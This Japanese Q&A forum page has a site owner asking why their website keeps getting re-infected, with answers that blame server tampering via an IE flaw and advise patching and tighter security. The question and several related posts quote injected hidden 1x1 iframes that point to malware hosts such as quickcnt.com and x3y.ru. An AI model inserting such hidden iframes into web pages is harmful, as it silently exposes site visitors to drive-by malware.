- ベストアンサー
サイトが何度も感染
数日前に自分のサイトがウイルスに感染しました。 サーバからデータを全消去・パソコンを再インストール後、サイトを再アップロード。 そのバックアップは感染の半月以上前にメディアに取ってあった物で、アップロード前にはカスペルスキーでファイルをスキャンしてみましたが何も出ず。 が、数時間後にサイトにアクセスするとまた感染を検出されます。 感染したサイトのインデックスファイルは、毎回bodyタグの後に↓のようなタグが勝手に書き加えられているのですが… <iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe> 本当は全部半角です。 サイトのデータがファイルスキャンで引っ掛からない何かに感染しているのでしょうか。それとも、他に何か原因があるのでしょうか?
- walnuts
- お礼率66% (2/3)
- ウィルス・マルウェア
- 回答数3
- ありがとう数2
- みんなの回答 (3)
- 専門家の回答
質問者が選んだベストアンサー
1.「iframe」が使われている。 ><iframe src= 2.ホームページに見えないリンクが埋め込まれている。 >width='1' height='1' style='visibility: hidden;' 以上の症状から、不正アクセスによりあなたのホームページが書き換えられていると思われます。 今年1月~2月にかけてこの種の事件が頻発しました。 http://itpro.nikkeibp.co.jp/article/NEWS/20070205/260645/ スーパーボウル開催地ドルフィン・スタジアムの公式Webサイトがマルウエアに感染,Websenseが警告:ITpro http://pc.nikkeibp.co.jp/article/NEWS/20070205/260652/?ST=pc_news スーパーボウル会場の公式サイトが改ざん、ウイルスコードを埋め込まれる:日経パソコンオンライン http://internet.watch.impress.co.jp/cda/news/2007/02/06/14697.html スーパーボウル会場のサイトに「MS06-014」「MS07-004」を突くコード http://www.itmedia.co.jp/enterprise/articles/0702/06/news022.html ITmedia エンタープライズ:スーパーボウル会場以外にも……多数のハッキング被害判明 http://www.itmedia.co.jp/enterprise/articles/0702/08/news027.html ITmedia エンタープライズ:スーパーボウル・ハッキングの攻撃経路判明 IEの脆弱性をつき、ホームページへアクセスしただけで、上記のリンク先(quickcnt.com)へアクセスして有害なプログラムをインストールさせようとするものです。 Windowsアップデートが最新の状態であればこの脆弱性は修復されていて、不正なリンク先へのアクセスは発生しないと思います。 もし、質問者さんが自前のサーバーを立ち上げておられるのであれば、そのサーバーはハッカーの標的にされているようですから、修復してもすぐまた不正なコードを書き込まれてしまうのではないでしょうか。 これに対し十分な対策を立てられないのであれば、そのサーバーは直ちに閉鎖すべきだと思います。 もし、いずれかのプロバイダーを使っておられるのであればプロバイダーに依頼して対策を立ててもらう必要があると思います。
その他の回答 (2)
- 123admin
- ベストアンサー率52% (1163/2214)
手持ちの全てのPCの徹底的なスキャンを推奨します。 なんらかのマルウェアに感染している可能性が非常に濃厚です。 レンタルサーバー側の問題と言うよりも、手持ちのPCが感染している確率が高いと思います。 質問の中のURLは既に活動を停止しているようですが、Googleでは感染サイトとして登録されています。 自分のサイトは一時閉鎖して、PCの感染が見つからない場合には全てPCのリカバリを行ってください。 カスペルスキーは検出力が高いとは言え絶対ではありません。 例えばサーバ用のツールなどに付随した実行型の悪意あるソフトがあった場合には検出は困難です。 現実問題、自分のサイトが感染している事を重く受け止めてください。 リカバリに関しては下記を参考にして下さい。 リカバリ基本編 http://iwata.way-nifty.com/home/2004/10/1017.html リカバリ応用編 http://iwata.way-nifty.com/home/2005/05/0530.html
補足
回答ありがとうございます。 ですが、この質問は、徹底的なスキャンもサイトの閉鎖もリカバリも全部やった後の話なんです。
然るに。 数時間で侵される場合、セキュリティ設定が弱すぎるのだと 思います。 何のOSのサーバか存じませんが、HTMLが書き換えられたり、 URLの振り先が変更されるというのはよろしくありません。 ためしに、パスワード等を難解なものにするとともに、 不要なポートは開けない、権限設定をきっちりする、 セキュリティパッチを充てるなど防御を高める必要があります。 防御を高めると、ポートスキャン程度の被害しか受けませんよ。
お礼
ご回答ありがとうございます。 セキュリティの設定を見直してみます。 サーバレンタル元(ロリポップなのですが)のサポートセンターからは「当方が原因ではありません」というような内容の返事しか返って来なかったので… 本当にありがとうございました。
関連するQ&A
- ウイルスの検知はないのに、ウェブサイトのソースにプログラムが勝手に挿入され修正ができない
ウェブサイトに <iframe src="http://xc8.**:8080/index.php" width=183 height=175 style="visibility: hidden"></iframe> というプログラムが勝手に挿入されて困っています。 ウイルスソフトがフリーのものだったので、カスペルスキー(internet security2009)を購入してスキャンしました。 以前は検知されていなかったTrojanなどいくつかのウイルスが検知されました。 勝手に挿入されるプログラムは、FTPサーバーにアップロードしたファイルを見ても入っていないのですが、ブラウザで確認すると入っています。削除とアップロードをしなおしてもまた入っていて、ウェブサイトは正常に表示できません。 レンタルサーバー側へもアカウントの変更をお願いし、一旦はなくなったのですが、また入ってしまったのか、再度アカウント変更をしても消すことができません。 カスペルスキーはフルスキャンしても「コンピューターは安全」と表示されるのですが、どうしたらよいかわからず困っています。よろしくお願いします。
- ベストアンサー
- ウィルス・マルウェア
- ホームページのウイルス?スパム?について・・・
ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。
- 締切済み
- ネットワーク
- 大至急 助けてください ウイルスに感染しました
大至急 助けてください ウイルスに感染しました なんか最近おかしいなと思ってウイルスセキュリティで完全スキャンしたら3個ウイルスに感染していました。 しかし、駆除してもぜんぜん改善されないのでシマンテックのオンラインスキャンしたらなんと135ファイル感染していました。 ついでにカスペルスキーもやったら検出数133ファイル検出しました。 ウイルスセキュリティってこんなもんですか? リカ張りしました。
- ベストアンサー
- ウィルス・マルウェア
- ウィルスに感染したファイルの処理
自分のパソコンには、カスペルスキーのインターネットセキュリティ6.0を入れていますが、最近なんとなくパソコンが怪しい動きをするので、スキャンしましたが、異常は見つかりませんでした。 でもやはり不安なので、ノートンでオンラインスキャンをしたら、やっぱり感染ファイルが3つでてきました>< そのファイルの入ってるフォルダを全部ゴミ箱に捨てて、空にしたのですが、これでウィルスはなくなったことになるのか心配になりました。 カスペルスキーでは、検知されないので、削除したのですが…(>_<)
- ベストアンサー
- ウィルス・マルウェア
- 連続ダウンロードのエラー
pdfファイルの連続ダウンロードを作っています。 複数ファイルをチェックボックスで指定して 指定した数のファイルをダウンロードさせるようにしているのですが 全部のファイルがダウンロードできません。 複数ファイルの選択 download.html チェックボックスでファイルの複数選択 それをJavaScriptでオンになっていたらダウンロードさせる。 window.open で呼び出す先は <iframe> ============================= <script language="JavaScript"> <!-- function down() { if (document.f1.file001.checked == true) { newwin = window.open("1.php","my1"); } if (document.f1.file002.checked == true) { newwin = window.open("2.php","my2"); } if (document.f1.file003.checked == true) { newwin = window.open("3.php","my3"); } if (document.f1.file004.checked == true) { newwin = window.open("4.php","my4"); } if (document.f1.file005.checked == true) { newwin = window.open("5.php","my5"); } } //--> </script> 中略 <form name="f1"> <input type="checkbox" value="on" name="file001"> <input type="checkbox" value="on" name="file002"> <input type="checkbox" value="on" name="file003"> <input type="checkbox" value="on" name="file004"> <input type="checkbox" value="on" name="file005"> <input type="button" value="ダウンロード" onclick="down()"> </form> 中略 <iframe src="index.html" name="my1" width="5" height="3" style="width:1px;height:1px;visibility:hidden;"> <iframe src="index.html" name="my2" width="5" height="3" style="width:1px;height:1px;visibility:hidden;"> <iframe src="index.html" name="my3" width="5" height="3" style="width:1px;height:1px;visibility:hidden;"> <iframe src="index.html" name="my4" width="5" height="3" style="width:1px;height:1px;visibility:hidden;"> <iframe src="index.html" name="my5" width="5" height="3" style="width:1px;height:1px;visibility:hidden;"> ====================================== ダウンロード用のファイル 1.php <?php // ダウンロードさせる元ファイル $filepath = "filepdf/file01.pdf"; // 保存時のファイル名(デフォルト) $filename = "ファイル1.pdf"; // HTTPヘッダ送信 header("Content-length: " . filesize($filepath)); header("Content-type: application/pdf"); header("Content-Disposition: attachment; filename=\"{$filename}\""); // ファイルを読み込んで出力 readfile($filepath); ?> ================================== 上記の用にソースを書いて複数ファイルのダウンロードを行っていますが、 1個ずつ選択した時はダウンロード成功 2個選択した時、2個目がダウンロードしない 3個以上選択した時、ダウンロードできないファイルが出てくる。 チェックを同じにして、数回試すと その度にダウンロードされないファイルが違っている。 なぜダウンロードされないファイルが出てくるのかがわかりません。 複数ファイルの連続ダウンロードでは、ダウンロードできるファイルの サイズに限りがあるとか、何かあるのでしょうか?
- ベストアンサー
- PHP
- gumblar-xに感染?
お恥ずかしい話ですが、対策が不十分で、FTPでhtmlファイルをアップロードすると、<script ~から始まるタグが付け足されたりして、Gumblar-xと思われる症状がいくつか出てしまいました。avast!が警告を出したので気づいたのですが…不正アクセスの履歴もありました。 ちなみに不正アクセスは数日前にパスワードを変えてから、現在のところは一度もありません。 それで駆除しようと、色々と関連サイトを見て、何度もウィルス検出を試みたのですが、どうしてもPCに感染箇所が見当たりません。また、動作が遅くなるなどの異常も見られません。 スキャンしても100%発見できるというわけではないとのことですが、こういう場合はどうしたらいいのでしょうか?リカバリをすれば問題ないのでしょうか? それとも別のウィルスに感染してしまったのか、他に問題があるのか、こういうことには素人なのでまったく分からず、お手上げ状態です。 どうすべきか方法を是非教えてください。よろしくお願いします。
- ベストアンサー
- スパイウェア
- カスペルスキーだけ感染してるって?
先日無料オンラインスキャンでカスペルスキーをやったときトロイに感染してるとでました。対策わからずそのままにしてます。しかし後日このgooにものってた他のスキャンでは、以上なしとでます。なんで?ちなみにトレンドマイクロのスキャンとスパイウェアドクターってやつ2つです。とくに後者の方はこのgooでトロイの木馬を徹底的に削除する!ってとこからつながったのに感染なしとでます。本当に感染してるんでしょうか?PCはあまりわかrずですがその後ファイル名を指定して実行ってやつでプログラムっていれたらカスペルでひっかかったCOMETってファイルがありました。 なにもわからずなのでおしえてください。
- 締切済み
- ウィルス・マルウェア
- youtubeの動画をサイトに埋め込む
この操作をして、 youtubeから動画を 埋め込みコードから サイトに取り込む作業をしました。 <iframe width="560" height="315" src="https://www.youtube.com/embed/smDcJkW20P0?controls=0" frameborder="0" allowfullscreen></iframe> しかしながら、 本文にHTMLタグは使用できません。 無効なHTMLタグを削除しました。 という文面が出て作業を拒否されました。 しかし、そのサイトでは、他の方々は、インストールに成功されています。 これはもう無理なのでしょうか。 解決策はありませんでしょうか。 windows 8.1を使っています。
- ベストアンサー
- その他(Windows)
- ウィルスiframeの対処法
最近私が公開しているサイトにiframeのタグが勝手に入りトップページの上部に異常なスペースが入っています。毎日確認して正常なデータをアップロードするのですが、ほぼ1日おきに異常が発生しています。 どうやら自動的にiframeのタグが入るようなプログラムが仕組まれてしまったようです。毎日データの入替えをしていますが、そのうち不正行為に取られ、サイトが閉鎖に追い込まれてしまうと困るので、どなたか対処法を知っている方がいましたら教えてください。
- ベストアンサー
- ネットワーク
- ホームページにウィルスは感染する?
ホームページをいくつか持っています。 このホームページ自体にウィルスを感染させることが可能だと聞いたことがありますが、本当でしょうか? 第三者が私の作成したHPにウィルスを感染させてしまうことができるのでしょうか? そして、もし感染した場合、除去の仕方はどうしたらよいのですか? 自分で作成したときのフォルダー、ファイルを全てスキャンして、削除してからアップロードすればそれでまたクリーンになるものなのでしょうか? 宜しくお願いします。
- 締切済み
- ネットワーク
お礼
回答ありがとうございます。 何が起きていたのか漸く判りました。 再インストール(というかリカバリ)してからMEだったのもいけなかったんでしょうかね。 すぐにXPにアップデートしてWindowsアップデートもするようにします。 本当にありがとうございました。